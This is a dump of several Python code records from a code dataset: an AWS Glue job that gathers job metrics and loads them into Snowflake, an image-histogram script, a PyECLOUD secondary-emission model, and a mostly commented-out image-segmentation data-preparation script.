settings.bus_stop_cost + (dist * 10)\n elif service[-1] == \"Train\":\n new_cost += settings.train_stop_cost + (dist * 10)\n else:\n new_cost += (settings.walking_cost + 1) * (dist * 10)\n\n # push the new path into the queue\n heapq.heappush(heap, (new_cost, dist + curr_dist, new_path))","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"523497884","text":"import sys\nimport re\nfrom awsglue.transforms import *\nfrom awsglue.utils import getResolvedOptions\nfrom pyspark.context import SparkContext\nfrom awsglue.context import GlueContext\nfrom awsglue.dynamicframe import DynamicFrame\nfrom awsglue.job import Job\nfrom datetime import datetime, timedelta, date\nfrom botocore.exceptions import ClientError\nfrom pyspark.sql.types import *\nimport boto3\nimport json\nimport csv\nimport io\nimport copy\n\n## @params: [JOB_NAME]\nargs = getResolvedOptions(sys.argv, 
['JOB_NAME','key_arn','Multiline','WORKFLOW_NAME','WORKFLOW_RUN_ID'])\n\nsc = SparkContext()\nglueContext = GlueContext(sc)\nspark = glueContext.spark_session\njob = Job(glueContext)\njob.init(args['JOB_NAME'], args)\n\n\nregion='us-east-1'\n\ns3_client = boto3.resource('s3', region_name=region)\nclient = boto3.client('cloudwatch', region_name=region)\nglue_client = boto3.client('glue', region_name=region)\ntime = datetime.utcnow().strftime ('%Y-%m-%d-%H-%M-%S')\nrun_date = date.today().strftime(\"%d/%m/%Y\")\n\n\ndef get_req_count(region, metric_name):\n print('start of method')\n response2 = client.get_metric_statistics(\n Namespace=\"Glue\",\n MetricName='CUSTOM_GLUE_1',\n Dimensions=[\n {'Name': 'Type', 'Value': 'count'},\n {\n 'Name': 'xyz',\n 'Value': 'ABC'\n },\n ],\n StartTime = datetime.utcnow() - timedelta(seconds = 60000),\n EndTime = datetime.utcnow(),\n Period=86460,\n Statistics=[\n \"Sum\",\n ]\n )\n\ndef get_worflow_job_list(workflow_name,exclude_job_list):\n workflow_graph=glue_client.get_workflow(Name=workflow_name, IncludeGraph=True)\n workflow_nodes=workflow_graph['Workflow']['Graph']['Nodes']\n print('workflow_nodes', workflow_nodes)\n exclude_job_list=exclude_job_list\n job_list=[]\n for node in workflow_nodes:\n if node['Type'] == 'JOB' and node['Name'] not in exclude_job_list :\n job_list.append(node['Name'])\n else:\n continue\n print('job_list', job_list)\n return job_list\n\ndef get_job_metrics( namespace, metric_name, metric_type, job_run_id, job_name, Statistics_type):\n print(namespace, metric_name, metric_type, job_run_id, job_name, Statistics_type)\n response = client.get_metric_statistics(\n Namespace=namespace,\n MetricName=metric_name,\n Dimensions=[\n {'Name': 'Type', 'Value': metric_type},\n {\n \"Name\": \"JobRunId\",\n \"Value\": job_run_id\n },\n {'Name': 'JobName', 'Value': job_name }\n ],\n StartTime = datetime.utcnow() - timedelta(seconds = 10800),\n EndTime = datetime.utcnow(),\n Period=300,\n Statistics= [Statistics_type]\n )\n data_points = response['Datapoints']\n print('response get_metric_statistics data_points', data_points)\n data_point = data_points[0] if data_points else 'data not available'\n stats = data_point[Statistics_type] if data_points else -1.0\n return stats\n\n\ndef write_cvs_into_s3(bucket, s3_path):\n\n fieldnames = ['Workflow_run_id','Workflow_name','Job_run_id','Job_name','Job_language','Source','Target','Glue_version', 'Worker_type', 'Number_of_workers','Number_of_rows','Number_of_columns','Elapsed_time','bytesRead','recordsRead','cpuSystemLoad','heap_usage','diskSpaceUsed_MB','Execution_timestamp']\n exclude_job_list = ['metrics_collector_glue_Job','fakedata_generator_job','performance_test_adhoc']\n #get all the job names in a list or array from the workflow api\n #get the first and last job name in fthe exclude job list\n #get the job metadata of the jobs\n #iterate on the list of jobs metadat list of jobs\n # call get_job_metrics with all params to get specific metrics\n # write it in csv in s3 bucket\n\n #glue_job_runs = glue_client.get_job_runs(JobName='ParquetLoadJob')\n #print('glue_job_runs', glue_job_runs)\n #print('glue_job_runs')\n job_names = get_worflow_job_list('performanceTestWf', exclude_job_list )\n batch_get_jobs = glue_client.batch_get_jobs(JobNames=job_names)\n print('batch_get_job', batch_get_jobs)\n print('batch_get_job')\n\n metrics_list = []\n # with open('/tmp/file_name', 'w', newline='') as csvFile:\n # w = csv.writer(csvFile, dialect='excel')\n # w.writerow(fieldnames)\n 
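The CloudWatch queries above all follow the same get_metric_statistics shape: a Glue namespace, Type/JobName/JobRunId dimensions, a time window, and a statistics list, with 'Datapoints' possibly empty. A hedged sketch of one generic fetcher; the dimension values are whatever your jobs actually emit, and -1.0 mirrors the script's sentinel for missing data:

import boto3
from datetime import datetime, timedelta

cw = boto3.client("cloudwatch", region_name="us-east-1")

def last_sum(metric_name, job_name, job_run_id, hours=3, period=300):
    resp = cw.get_metric_statistics(
        Namespace="Glue",
        MetricName=metric_name,
        Dimensions=[
            {"Name": "Type", "Value": "count"},
            {"Name": "JobName", "Value": job_name},
            {"Name": "JobRunId", "Value": job_run_id},
        ],
        StartTime=datetime.utcnow() - timedelta(hours=hours),
        EndTime=datetime.utcnow(),
        Period=period,
        Statistics=["Sum"],
    )
    points = resp["Datapoints"]                  # may be empty if nothing was emitted
    return points[0]["Sum"] if points else -1.0  # same sentinel as the script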
#batch_get_jobs['Jobs']\n namespace = 'Glue'\n metric_type_count = 'count'\n metric_type_gauge = 'gauge'\n #job_run_id = 'ALL'\n #get job runid from workflow runid\n Statistics_type_avg = 'Average'\n Statistics_type_max = 'Max'\n Statistics_type_sum = 'Sum'\n Workflow_run_id = args['WORKFLOW_RUN_ID']\n Workflow_name = args['WORKFLOW_NAME']\n workflowProperties = glue_client.get_workflow_run_properties(\n Name = args['WORKFLOW_NAME'],\n RunId = args['WORKFLOW_RUN_ID']\n )['RunProperties']\n # fieldnames = ['Job_name','Job_language', 'Glue_version', 'Worker_type', 'Number_of_workers','Number_of_rows','Number_of_columns','Elasped_time','Execution_timestamp']\n for job in batch_get_jobs['Jobs']:\n print('JOB details ::', job)\n Job_name = job['Name']\n job_run_id = workflowProperties[Job_name]\n print('job_run_id ::', job_run_id)\n default_arguments = job['DefaultArguments']\n Job_language = default_arguments['--job-language'] if '--job-language' in default_arguments else 'python'\n Glue_version = job['GlueVersion']\n Number_of_workers = job['NumberOfWorkers']\n Worker_type = job['WorkerType']\n Metric_list = ['glue.driver.aggregate.elapsedTime','glue.driver.aggregate.bytesRead','glue.driver.aggregate.recordsRead','glue.driver.system.cpuSystemLoad','glue.driver.jvm.heap.usage','glue.driver.BlockManager.disk.diskSpaceUsed_MB']\n\n job_definition = glue_client.get_job_run(\n JobName=Job_name,\n RunId=job_run_id,\n PredecessorsIncluded=False\n )['JobRun']\n job_execution_time = float(job_definition['ExecutionTime'])\n metric_mappings= {\n 'glue.driver.aggregate.elapsedTime': [Statistics_type_avg,\"count\"],\n 'glue.driver.aggregate.bytesRead' : [Statistics_type_sum,\"count\"],\n 'glue.driver.aggregate.recordsRead': [Statistics_type_sum,\"count\"],\n 'glue.driver.system.cpuSystemLoad': [Statistics_type_avg,\"gauge\"],\n 'glue.driver.jvm.heap.usage': [Statistics_type_avg,\"gauge\"],\n 'glue.driver.BlockManager.disk.diskSpaceUsed_MB': [Statistics_type_avg,\"gauge\"] \n }\n # Elapsed_time = get_job_metrics(namespace,'glue.driver.aggregate.elapsedTime',metric_type_count,job_run_id,Job_name, Statistics_type_avg )\n # bytesRead = get_job_metrics(namespace,'glue.driver.aggregate.bytesRead',metric_type_count,job_run_id,Job_name, Statistics_type_avg )\n # recordsRead = get_job_metrics(namespace,'glue.driver.aggregate.recordsRead',metric_type_count,job_run_id,Job_name, Statistics_type_sum )\n # cpuSystemLoad = get_job_metrics(namespace,'glue.driver.system.cpuSystemLoad',metric_type_gauge,job_run_id,Job_name, Statistics_type_avg )\n # heap_usage = get_job_metrics(namespace,'glue.driver.jvm.heap.usage',metric_type_gauge,job_run_id,Job_name, Statistics_type_avg )\n # diskSpaceUsed_MB = get_job_metrics(namespace,'glue.driver.BlockManager.disk.diskSpaceUsed_MB',metric_type_gauge,job_run_id,Job_name, Statistics_type_avg )\n # get it from the input test json set on workflow\n met = {}\n for a in Metric_list:\n met.__setitem__(a,get_job_metrics(namespace,a,metric_mappings[a][1],job_run_id,Job_name, metric_mappings[a][0] ))\n met.__setitem__(\"job_execution_time\",job_execution_time)\n \n Number_of_rows = int(workflowProperties[\"TestRows\"])\n Number_of_columns = int(workflowProperties[\"TestColumns\"])\n source = workflowProperties[\"TestSource\"]\n target = workflowProperties[\"TestTarget\"]\n\n dict_val = dict()\n dict_val['Workflow_run_id'] = Workflow_run_id\n dict_val['Workflow_name'] = Workflow_name\n dict_val['Job_run_id'] = job_run_id\n dict_val['Job_name'] = Job_name\n dict_val['Job_language'] = 
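The metric_mappings table above pairs each Glue metric name with its (statistic, metric type), so a single loop replaces six near-identical calls. A standalone sketch of that table-driven dispatch, with a stub standing in for get_job_metrics:

metric_mappings = {
    "glue.driver.aggregate.elapsedTime": ("Average", "count"),
    "glue.driver.aggregate.recordsRead": ("Sum", "count"),
    "glue.driver.jvm.heap.usage": ("Average", "gauge"),
}

def fetch(metric_name, statistic, metric_type):
    # stand-in for get_job_metrics(namespace, metric_name, metric_type, ...)
    return 0.0

met = {name: fetch(name, stat, mtype)
       for name, (stat, mtype) in metric_mappings.items()}
met["job_execution_time"] = 42.0  # illustrative; the script appends it the same way
print(met)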
Job_language\n dict_val['Source'] = source\n dict_val['Target'] = target\n dict_val['Glue_version'] = Glue_version\n dict_val['Worker_type'] = Worker_type\n dict_val['Number_of_workers'] = Number_of_workers\n dict_val['Number_of_rows'] = Number_of_rows\n dict_val['Number_of_columns'] = Number_of_columns\n dict_val['Execution_timestamp'] = time\n\n\n for metric in met:\n # Metric_value = get_job_metrics(namespace,metric,metric_type_count,job_run_id,Job_name, Statistics_type_avg )\n \n dict_temp = copy.deepcopy(dict_val)\n dict_temp['Metric_name'] = metric\n dict_temp['Metric_value'] = met[metric]\n metrics_list.append(dict_temp)\n\n # dict_val['Elapsed_time'] = Elapsed_time\n # dict_val['bytesRead'] = bytesRead\n # dict_val['recordsRead'] = recordsRead\n # dict_val['cpuSystemLoad'] = cpuSystemLoad\n # dict_val['heap_usage'] = heap_usage\n # dict_val['diskSpaceUsed_MB'] = diskSpaceUsed_MB\n # dict_val['Execution_timestamp'] = time\n\n\n #metrics_list.append(dict_val)\n # row = [\n # Workflow_run_id,\n # Workflow_name,\n # job_run_id,\n # Job_name,\n # Job_language,\n # source,\n # target,\n # Glue_version,\n # Worker_type,\n # Number_of_workers,\n # Number_of_rows,\n # Number_of_columns,\n # Elapsed_time,\n # bytesRead,\n # recordsRead,\n # cpuSystemLoad,\n # heap_usage,\n # diskSpaceUsed_MB,\n # time,\n # ]\n # w.writerow(row)\n # row = []\n # csvFile.close()\n # bucket.upload_file('/tmp/file_name', s3_path)\n print('dictionary test :', metrics_list)\n #sourceDf = sc.parallelize(metrics_list).toDF()\n schema = StructType([ \\\n StructField(\"Workflow_run_id\",StringType(),True), \\\n StructField(\"Workflow_name\",StringType(),True), \\\n StructField(\"Job_run_id\",StringType(),True), \\\n StructField(\"Job_name\",StringType(),True), \\\n StructField(\"Job_language\",StringType(),True), \\\n StructField(\"Source\",StringType(),True), \\\n StructField(\"Target\",StringType(),True), \\\n StructField(\"Glue_version\",StringType(),True), \\\n StructField(\"Number_of_workers\", IntegerType(), True), \\\n StructField(\"Worker_type\",StringType(),True), \\\n StructField(\"Number_of_rows\", IntegerType(), True), \\\n StructField(\"Number_of_columns\", IntegerType(), True), \\\n StructField(\"Metric_name\", StringType(), True), \\\n StructField(\"Execution_timestamp\", StringType(), True), \\\n StructField(\"Metric_value\", DoubleType(), True) \\\n ])\n print('schema', schema)\n df = spark.createDataFrame(data = metrics_list, schema = schema )\n print('dataframe created ')\n df.printSchema()\n print('schema printed')\n df.show(truncate=False)\n\n tableName=\"GLUE_PERFORMANCE_TEST\"\n stageTable = tableName + \"__STAGE\"\n begin_txn = \"BEGIN TRANSACTION;\"\n create_main_table_if_not_exist = \"\"\"create table \"\"\" + tableName +\"\"\" IF NOT EXISTS AS SELECT * FROM \"\"\"+ stageTable + \"\"\" WHERE 1=2 ;\"\"\"\n insert_into_main_table = \"\"\"Insert into \"\"\" + tableName +\"\"\" SELECT * FROM \"\"\"+ stageTable + \"\"\" ;\"\"\"\n truncate_stage = \"TRUNCATE TABLE \"+stageTable + \" ;\"\n commit_work = \"Commit WORK;\"\n\n preactions = begin_txn+create_main_table_if_not_exist\n postactions = insert_into_main_table+truncate_stage+commit_work\n print (preactions)\n print (postactions)\n secret_client = boto3.client(\"secretsmanager\", region_name=\"us-east-1\", endpoint_url=\"https://secretsmanager.us-east-1.amazonaws.com\")\n response = secret_client.get_secret_value(SecretId=args['key_arn'])\n\n print (\"secret generated\")\n new_test = re.sub(\"-*(BEGIN|END) RSA PRIVATE KEY-*\\r\\n\",\"\", 
response[\"SecretString\"]).replace(\"\\n\",\"\").replace(\"\\r\",\"\")\n snowflake_properties = {\n \"sfUrl\": \"sfceawseast1d01.us-east-1.privatelink.snowflakecomputing.com\",\n \"sfDatabase\": \"CNAS_DEV\",\n \"sfWarehouse\": \"CNAS_DEV_WAREHOUSE\",\n \"pem_private_key\": new_test,\n \"sfUser\": \"CNAS_DEV_SNOWFLAKE_GLUE_USER\",\n \"sfRole\": \"CNAS_DEV_ROLE\",\n \"sfSchema\": \"PUBLIC\",\n \"connectionName\": \"snowflakeConnection\",\n }\n # print (\"Write from DF starts\")\n\n # Sink0.write.format(SNOWFLAKE_SOURCE_NAME).options(**snowflake_properties).option(\"dbtable\", \"\"\"\"+tableName+\"\"\"__STAGE\").option(\"preactions\", preactions).option(\"postactions\", postactions).mode(\"append\").save()\n # DynamicFrame.fromDF(Sink0, glueContext, \"test_frame_conversion\")\n # print (\"Write form df end\")\n SNOWFLAKE_SOURCE_NAME = \"net.snowflake.spark.snowflake\"\n print (\"Writing started\")\n df.write.format(SNOWFLAKE_SOURCE_NAME).options(**snowflake_properties).option(\"dbtable\", stageTable).option(\"preactions\", preactions).option(\"postactions\", postactions).mode(\"append\").save()\n #glueContext.write_dynamic_frame.from_options(frame = DynamicFrame.fromDF(sourceDf,glueContext,\"sourceDf\"), connection_type=\"custom.spark\", connection_options=snowflake_properties_dynamic)\n print (\"write ended\")\n #namespace, metric_name, metric_type, job_run_id, job_name, Statistics_type\n #'WorkerType': 'G.1X', 'NumberOfWorkers': 3, 'GlueVersion': '2.0'\n\ns3_client = boto3.resource('s3')\nbucket = s3_client.Bucket('terraform-20210726142826483100000007')\nfile_name = ('glue_job_metrics' + time + '.csv')\ns3_path = 'glue_job_metrics/'+run_date+'/'+file_name\nwrite_cvs_into_s3(bucket, s3_path)\njob.commit()\n","sub_path":"metric_collector_job.py","file_name":"metric_collector_job.py","file_ext":"py","file_size_in_byte":14162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"521253332","text":"import numpy as np\nimport cv2\nimport os\nimport glob\nfrom numpy import array\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nimport math\nimport matplotlib.mlab as mlab\n\ntry:\n os.mkdir('part2_plot')\nexcept:\n pass\n \n# Read images\nimg_dir=\"Part2_fig/\"\nthree_files = [\"6667.JPG\", \"1500.JPG\", \"0250.JPG\"]\na_list = [1., 6667./1000, 6667./250]\ng_channel = [2.465, 2.510, 2.518] # get from Part1\ncolors = ['b', 'g', 'r']\n\n# Plot\nfor i in range(0, len(three_files)):\n img=cv2.imread(img_dir+three_files[i])\n for channel, col in enumerate(colors):\n img_channel=img[:,:,channel]\n b_prime_g = np.power(img_channel, g_channel[channel])\n plt.subplot(2,2,channel+1)\n _max = int(pow(255,g_channel[channel]))+1\n plt.hist(b_prime_g.ravel(),bins=25,range=[0, _max],color=col.lower())\n plt.title('%s Channel' %col.upper())\n\n plt.gcf().set_size_inches(18.5, 10.5)\n plt.savefig('part2_plot/B\\'_vs_T_image_%s.jpg' %(three_files[i]))\n plt.gcf().clear()\n\n if i > 0:\n a = a_list[i]\n for channel, col in enumerate(colors):\n img_channel=img[:,:,channel]\n b_prime_g = np.power(img_channel, g_channel[channel])\n b_prime_g_div_a=np.divide(b_prime_g, a)\n plt.subplot(2,2,channel+1)\n _max = int(pow(255,g_channel[channel])/a)+1\n plt.hist(b_prime_g_div_a.ravel(),bins=25,range=[0, _max], color=col.lower())\n plt.title('%s Channel' %col.upper())\n \n plt.gcf().set_size_inches(18.5, 10.5)\n plt.savefig('part2_plot/B\\'_div_a_vs_T_image_%s.jpg' %(three_files[i]))\n 
plt.gcf().clear()\n","sub_path":"part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"422040578","text":"#-Begin-preamble-------------------------------------------------------\n#\n# CERN\n#\n# European Organization for Nuclear Research\n#\n#\n# This file is part of the code:\n#\n# PyECLOUD Version 8.6.0\n#\n#\n# Main author: Giovanni IADAROLA\n# BE-ABP Group\n# CERN\n# CH-1211 GENEVA 23\n# SWITZERLAND\n# giovanni.iadarola@cern.ch\n#\n# Contributors: Eleonora Belli\n# Philipp Dijkstal\n# Lorenzo Giacomel\n# Lotta Mether\n# Annalisa Romano\n# Giovanni Rumolo\n# Eric Wulff\n#\n#\n# Copyright CERN, Geneva 2011 - Copyright and any other\n# appropriate legal protection of this computer program and\n# associated documentation reserved in all countries of the\n# world.\n#\n# Organizations collaborating with CERN may receive this program\n# and documentation freely and without charge.\n#\n# CERN undertakes no obligation for the maintenance of this\n# program, nor responsibility for its correctness, and accepts\n# no liability whatsoever resulting from its use.\n#\n# Program and documentation are provided solely for the use of\n# the organization to which they are distributed.\n#\n# This program may not be copied or otherwise distributed\n# without permission. This message must be retained on this and\n# any other authorized copies.\n#\n# The material cannot be sold. CERN should be given credit in\n# all references.\n#\n#-End-preamble---------------------------------------------------------\n\nfrom numpy import sqrt, exp\nfrom numpy.random import rand\nfrom .sec_emission_model_ECLOUD import SEY_model_ECLOUD\n\n\ndef yield_fun3(E, costheta, Emax, del_max, R0, E0):\n\n s = 1.35\n\n del_max_tilde = del_max * exp(0.5 * (1 - costheta))\n E_max_tilde = Emax * (1 + 0.7 * (1 - costheta))\n\n x = E / E_max_tilde\n\n del_true_sec = del_max_tilde * (s * x) / (s - 1 + x**s)\n del_reflected = R0 * ((sqrt(E) - sqrt(E + E0)) / (sqrt(E) + sqrt(E + E0)))**2\n\n delta = del_true_sec + del_reflected\n\n ref_frac = del_reflected / delta\n\n return del_true_sec, del_reflected, ref_frac\n\n\nclass SEY_model_acc_low_ene(SEY_model_ECLOUD):\n def __init__(self, Emax, del_max, R0, E0=150,\n E_th=None, sigmafit=None, mufit=None,\n switch_no_increase_energy=0, thresh_low_energy=None, secondary_angle_distribution=None,\n ):\n\n self.E_th = E_th\n self.sigmafit = sigmafit\n self.mufit = mufit\n self.switch_no_increase_energy = switch_no_increase_energy\n self.thresh_low_energy = thresh_low_energy\n self.secondary_angle_distribution = secondary_angle_distribution\n\n if secondary_angle_distribution is not None:\n from . import electron_emission\n self.angle_dist_func = electron_emission.get_angle_dist_func(secondary_angle_distribution)\n else:\n self.angle_dist_func = None\n\n self.Emax = Emax\n self.del_max = del_max\n self.R0 = R0\n self.E0 = E0\n\n def SEY_process(self, nel_impact, E_impact_eV, costheta_impact, i_impact):\n\n del_true_sec, del_reflected, ref_frac = yield_fun3(E_impact_eV, costheta_impact, self.Emax, self.del_max, self.R0, E0=self.E0)\n ref_prob = del_reflected\n beta_ts = del_true_sec / (1. 
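A quick numeric check of yield_fun3 above: at normal incidence (costheta = 1) and E = Emax, x = 1, so the true-secondary term reduces to del_max exactly, while the reflected term stays small at high energy. The parameter values below are illustrative, not fitted machine parameters:

from numpy import sqrt, exp

def yield_fun3(E, costheta, Emax, del_max, R0, E0):
    s = 1.35
    del_max_t = del_max * exp(0.5 * (1 - costheta))
    E_max_t = Emax * (1 + 0.7 * (1 - costheta))
    x = E / E_max_t
    del_true = del_max_t * (s * x) / (s - 1 + x ** s)
    del_refl = R0 * ((sqrt(E) - sqrt(E + E0)) / (sqrt(E) + sqrt(E + E0))) ** 2
    return del_true, del_refl

ts, refl = yield_fun3(330.0, 1.0, Emax=330.0, del_max=1.7, R0=0.7, E0=150.0)
print(ts, refl)   # ts == 1.7 at the peak; refl ~ 0.006 here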
- del_reflected)\n\n flag_elast = (rand(len(ref_prob)) < ref_prob)\n flag_truesec = ~(flag_elast)\n\n nel_emit = nel_impact.copy()\n nel_emit[flag_truesec] = nel_impact[flag_truesec] * beta_ts[flag_truesec]\n\n return nel_emit, flag_elast, flag_truesec\n","sub_path":"sec_emission_model_accurate_low_ene.py","file_name":"sec_emission_model_accurate_low_ene.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"44901734","text":"import importlib\r\nimport tensorflow as tf\r\nimport utils2; importlib.reload(utils2)\r\nimport keras\r\nimport numpy as np\r\nimport pandas as pd\r\nimport keras.backend as K\r\nfrom keras.models import Model\r\nfrom keras.layers import Activation, Dropout, BatchNormalization, Conv2D, Conv2DTranspose, Input, Reshape, MaxPooling2D\r\nfrom keras.regularizers import l2\r\nfrom keras.layers import concatenate\r\nimport cv2\r\nimport glob\r\nimport sys\r\nimport re\r\n\r\n\r\n\r\n# def open_image(fn): return np.array(Image.open(fn))\r\n#\r\n# imgs = np.stack([open_image(fn) for fn in fnames])\r\n# labels = np.stack([open_image(fn) for fn in lnames])\r\n#\r\n# imgs = imgs/255.\r\n#\r\n# save_array(PATH+'results/imgs2.bc', imgs)\r\n# save_array(PATH+'results/labels2.bc', labels)\r\n# imgs = load_array(PATH+'results/imgs2.bc')\r\n# labels = load_array(PATH+'results/labels2.bc')\r\n# imgs = load_array(PATH+'results/imgs.bc')\r\n# labels = load_array(PATH+'results/labels.bc')\r\n#\r\n# n,r,c,ch = imgs.shape\r\n# imgs-=0.4\r\n# imgs/=0.3\r\n#\r\n# # Train set\r\n# trn = imgs[is_test==False] # Training images\r\n# trn_labels = labels_int[is_test==False] # Training labels\r\n#\r\n# # Test set\r\n# test = imgs[is_test] # Test images\r\n# test_labels = labels_int[is_test] # Test labels ????\r\n#\r\n#\r\n# rnd_trn = len(trn_labels)\r\n# rnd_test = len(test_labels)\r\n\r\n# ########### With background ###############\r\nBasepath_with_background = '/Volumes/Segate 3TB/segmentation_data/imgs_background'\r\nwith_background_PNG = '/Volumes/Segate 3TB/segmentation_data/imgs_background/*.png'\r\n# ######### Without background ##############\r\nBasepath_without_background = '/Volumes/Segate 3TB/segmentation_data/imgs_no_background'\r\nwithout_background_PNG = '/Volumes/Segate 3TB/segmentation_data/imgs_no_background/*.png'\r\n\r\n\r\n####################################################################################################################\r\n####################################################################################################################\r\n\r\n\r\n# To map labeled/without_bakgnd images to their original versions and get w/_back--no_back pairs for training\r\n# def find_train_set(Basepath_with_background, Basepath_without_background,\r\n# with_background_PNG, without_background_PNG):\r\n# names_with_background = os.listdir(Basepath_with_background)\r\n# names_without_background = os.listdir(Basepath_without_background)\r\n#\r\n# with_background_DIRS = glob.glob(with_background_PNG)\r\n# without_background_DIRS = glob.glob(without_background_PNG)\r\n#\r\n# selected_names_with_background = []\r\n#\r\n# for image_without in range(0, len(names_without_background)): # 5001 iterations\r\n#\r\n# for image_with in range(0, len(names_with_background)): # 75015 iterations\r\n#\r\n# if (Counter(names_with_background[image_with][:11])) == (\r\n# Counter(names_without_background[image_without][:11])):\r\n# 
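SEY_process above splits macroparticles with a vectorized Monte Carlo draw: a particle is elastically reflected when a uniform sample falls below ref_prob, otherwise its charge is rescaled by the true-secondary factor. A standalone sketch with made-up numbers:

import numpy as np
from numpy.random import rand

nel_impact = np.ones(5)                         # impacting macroparticle charges
ref_prob   = np.array([0.1, 0.9, 0.5, 0.2, 0.7])
beta_ts    = np.full(5, 1.3)                    # true-secondary yield factor

flag_elast   = rand(len(ref_prob)) < ref_prob   # elastic reflection mask
flag_truesec = ~flag_elast

nel_emit = nel_impact.copy()
nel_emit[flag_truesec] = nel_impact[flag_truesec] * beta_ts[flag_truesec]
print(flag_elast, nel_emit)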
selected_names_with_background.append(names_with_background[image_with])\r\n#\r\n# df = pd.DataFrame(selected_names_with_background)\r\n# df.to_csv('selected_with_background.csv')\r\n# print(selected_names_with_background)\r\n\r\n\r\n# Convert no_bkgrnd images to 1D arrays of labels (960,540) of [0,1].\r\n# Saving the image labels to threshold image-array\r\n\r\n# def masks_to_labels(addrs): # Doesn't work when calling as a function for some reason !!!\r\n# labels = []\r\n# for image in range(0, len(addrs)):\r\n# print(image)\r\n# img = cv2.imread(addrs[image])\r\n# grayscaled = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n# retval, threshold = cv2.threshold(grayscaled, 0, 255, cv2.THRESH_BINARY)\r\n# labels.append(threshold)\r\n# return labels\r\n# def load_image(addr):\r\n# # read an image and resize to (224, 224)\r\n# # cv2 load images as BGR, convert it to RGB\r\n# img = cv2.imread(addr)\r\n# img = cv2.resize(img, (224, 224), interpolation=cv2.INTER_CUBIC)\r\n# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n# img = img.astype(np.float32)\r\n# return img\r\n# def _int64_feature(value):\r\n# return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\r\n# def _bytes_feature(value):\r\n# return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\r\n# def atoi(text):\r\n# return int(text) if text.isdigit() else text\r\n# def natural_keys(text):\r\n# '''\r\n# alist.sort(key=natural_keys) sorts in human order\r\n# http://nedbatchelder.com/blog/200712/human_sorting.html\r\n# (See Toothy's implementation in the comments)\r\n# '''\r\n# return [atoi(c) for c in re.split('(\\d+)', text)]\r\n# def duplicate(testList, n):\r\n# # duplicate adresses so we have correct number of labels\r\n# return [ele for ele in testList for _ in range(n)]\r\n# ######################################## Write-Read from TFRecords ###############################################\r\n####################################################################################################################\r\n####################################################################################################################\r\n\r\n\r\n# image_addrs = glob.glob(with_background_PNG)\r\n# labels_addrs = glob.glob(without_background_PNG)\r\n#\r\n# # Sort adresses so images with background map images without\r\n# image_addrs.sort(key=natural_keys)\r\n# labels_addrs.sort(key=natural_keys)\r\n#\r\n# # duplicate each item in the list 15 times\r\n# labels_duplicated = duplicate(labels_addrs, 15)\r\n\r\n# Saving all adresses to make sure the mapping is correct\r\n# df = pd.DataFrame(\r\n# {\r\n# 'with_back': image_addrs,\r\n# 'without_back:': labels_duplicated\r\n# })\r\n#\r\n# df.to_csv('AI_segmentation_adresses.csv', sep=\",\")\r\n\r\n######################################################################\r\n# ################### Converting images to labels ####################\r\n######################################################################\r\n\r\n# all_labels = []\r\n# i = 0\r\n# for image in labels_duplicated:\r\n# i = i + 1\r\n# print(i)\r\n# img = cv2.imread(image)\r\n# grayscaled = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n# retval, threshold = cv2.threshold(grayscaled, 0, 255, cv2.THRESH_BINARY)\r\n# # threshold = threshold/255\r\n# all_labels.append(threshold)\r\n#\r\n# print('len: ', len(all_labels))\r\n# print('type: ', type(all_labels))\r\n# print('shape of the 2nd item in the list: ', np.shape(all_labels[1]))\r\n# all_labels = 
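The commented natural_keys helper above is the standard human-order sort: split digit runs out with re.split('(\d+)', ...) and compare them as integers. A runnable sketch:

import re

def natural_keys(text):
    return [int(c) if c.isdigit() else c for c in re.split(r"(\d+)", text)]

names = ["img10.png", "img2.png", "img1.png"]
print(sorted(names, key=natural_keys))   # ['img1.png', 'img2.png', 'img10.png']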
np.array(all_labels)\r\n######################################################################\r\n######################################################################\r\n\r\n# # Train set of the data\r\n# train_addrs = image_addrs[0:int(0.8 * len(image_addrs))]\r\n# # train_labels = all_labels[0:int(0.8 * len(all_labels))]\r\n#\r\n# # Test set of the data\r\n# test_addrs = image_addrs[int(0.8 * len(image_addrs)):int(1.0 * len(image_addrs))]\r\n# test_labels = all_labels[int(0.8 * len(all_labels)):int(1.0 * len(all_labels))]\r\n\r\n###########################################################\r\n###########################################################\r\n# train_filename = '/Volumes/Segate 3TB/segmentation_data/AI_background_train.tfrecords'\r\n# # open the TFRecords file\r\n# writer = tf.python_io.TFRecordWriter(train_filename)\r\n# for i in range(len(train_addrs)):\r\n#\r\n# # print how many images are saved every 1000 images\r\n# if not i % 1000:\r\n# print('Train data: {}/{}'.format(i, len(train_addrs)))\r\n# sys.stdout.flush()\r\n#\r\n# # Load the image\r\n# img = load_image(train_addrs[i])\r\n# label = all_labels[i] # Arrays\r\n# label = label.astype(np.float32)\r\n#\r\n# # Create a dictionary of features, where the key is the name of the features and the value is a tf.train.Feature\r\n# feature = {'train/label': _bytes_feature(tf.compat.as_bytes(label.tostring())),\r\n# 'train/image': _bytes_feature(tf.compat.as_bytes(img.tostring()))}\r\n#\r\n# # Create an example protocol buffer\r\n# example = tf.train.Example(features=tf.train.Features(feature=feature))\r\n#\r\n# # Serialize to string and write on the file\r\n# writer.write(example.SerializeToString())\r\n#\r\n# writer.close()\r\n# sys.stdout.flush()\r\n\r\n# ############################################################################\r\n\r\n# test_filename = '/Volumes/Segate 3TB/segmentation_data/AI_background_test.tfrecords'\r\n# writer = tf.python_io.TFRecordWriter(test_filename)\r\n#\r\n# for i in range(len(test_addrs)):\r\n#\r\n# # print how many images are saved every 1000 images\r\n# if not i % 1000:\r\n# print('Test data: {}/{}'.format(i, len(test_addrs)))\r\n# sys.stdout.flush()\r\n#\r\n# # Load the image\r\n# img = load_image(test_addrs[i])\r\n# label = test_labels[i]\r\n# label = label.astype(np.float32)\r\n#\r\n# # Create a feature\r\n# feature = {'test/label': 